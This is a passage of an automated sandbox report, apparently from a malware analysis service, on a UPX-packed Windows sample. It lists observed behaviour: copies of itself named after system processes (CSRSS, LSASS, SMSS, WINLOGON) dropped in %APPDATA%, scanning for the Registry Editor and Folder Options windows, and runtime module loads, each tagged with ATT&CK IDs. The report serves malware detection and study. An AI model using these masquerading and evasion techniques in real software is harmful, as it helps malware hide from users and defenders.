\"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005832)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00004312)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00004312)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00004304)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"RegEdit_RegEdit\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for window \"Registry Editor\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for window \"Folder Options\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for window \"Local Settings\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"ExploreWClass\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"CabinetWClass\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"RebarWindow32\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"ComboBoxEx32\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"ComboBox\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"Edit\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has an writable section named \"UPX0\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has an writable section named \"UPX1\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named \"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe\" has an writable section named \"UPX0\"\n \"4k51k4.exe\" has an writable section named \"UPX1\"\n \"4k51k4.exe\" has an writable section named \".rsrc\"\n \"CSRSS .exe\" has an writable section named \"UPX0\"\n \"CSRSS .exe\" has an writable section named \"UPX1\"\n \"CSRSS .exe\" has an writable section named \".rsrc\"\n \"New Folder.exe\" has an writable section named \"UPX0\"\n \"New Folder.exe\" has an writable section named \"UPX1\"\n \"New Folder.exe\" has an writable section named \".rsrc\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an writable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an writable section named \".rsrc\"\n \"Empty.pif\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has an executable section named \"UPX0\"\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe\" has an executable section named \"UPX0\"\n \"4k51k4.exe\" has an executable section named \"UPX1\"\n \"CSRSS .exe\" has an executable section named \"UPX0\"\n \"CSRSS .exe\" has an executable section named \"UPX1\"\n \"New Folder.exe\" has an executable section named \"UPX0\"\n \"New Folder.exe\" has an executable section named \"UPX1\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX0\"\n \"Data HAPUBWS.exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX0\"\n \"WINLOGON.EXE.bin\" has an executable section named \"UPX1\"\n \"IEXPLORER.EXE.67A9CA14.bin\" has an executable section named \"UPX0\"\n \"IEXPLORER.EXE.67A9CA14.bin\" has an executable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9C477.bin\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"KERNEL32\" at base 76b20000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"DWMAPI.DLL\" at base 73b80000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"OLE32.DLL\" at base 769a0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"USER32\" at base 76ef0000\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 76b20000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 73b80000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 769a0000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"4k51k4.exe\" loaded module \"USER32\" at base 76ef0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76b20000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 73b80000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 769a0000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76ef0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75170000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76b20000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75170000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 769a0000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76ef0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 75170000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75170000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73b80000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 769a0000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76ef0000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76b20000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76b20000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75170000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 769a0000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76ef0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 769a0000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76ef0000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76b20000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75170000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76b20000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75160000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 772c0000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75170000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 74c70000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74a00000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 756b0000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 73b80000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76b20000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 769a0000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74160000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76b20000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 76c00000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 774f0000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 75620000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73ff0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 746d0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76ef0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75110000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73e30000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c10000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a260000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a290000\n \"LSASS.EXE\" loaded module \"DWMAPI.DLL\" at base 73b80000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006024)\n \"50a62c91d8666e2ff94f9755556239a7ae848814c408fa5e82d4a58ccc581e43.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006024)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005832)\n \"4k51k4.exe\" 